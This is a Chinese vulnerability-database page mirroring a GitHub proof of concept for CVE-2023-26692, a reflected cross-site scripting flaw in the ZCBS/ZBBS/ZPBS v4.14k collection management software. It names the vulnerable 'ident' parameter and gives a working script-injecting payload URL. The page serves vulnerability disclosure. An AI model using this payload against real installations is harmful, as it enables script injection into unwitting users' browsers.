漏洞平台

POC详情： 2a55125ebdd85196729ededc684eb3433bd74682

来源

https://github.com/bigzooooz/CVE-2023-26692

关联漏洞

标题： Zijper Collectie Beheer Systeem 跨站脚本漏洞 (CVE-2023-26692)
描述：Zijper Collectie Beheer Systeem是ZCBS的Zijper馆藏管理系统(ZCBS) Zijper Collectie Beheer Systeem 存在安全漏洞，该漏洞源于存在反射型跨站脚本（XSS）漏洞。

描述

ZCBS/ZBBS/ZPBS v4.14k - Reflected XSS

介绍

# CVE-2023-26692
 ZCBS/ZCBS/ZPBS/ZBBS Reflected XSS
 
#### Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected XSS
#### Date: 2023-03-30
#### CVE: CVE-2023-26692
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.zcbs.nl
#### Software Link: https://www.zcbs.nl/cgi-bin/objecten.pl
#### Version: 4.14k
#### Tested on: LAMP, Ubuntu

---
[#] Vulnerability :
`$_GET['ident']`

[#] Exploitation :
`https://localhost/cgi-bin/objecten.pl?ident=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E`

文件快照


 [4.0K]  /data/pocs/2a55125ebdd85196729ededc684eb3433bd74682
└── [ 509]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。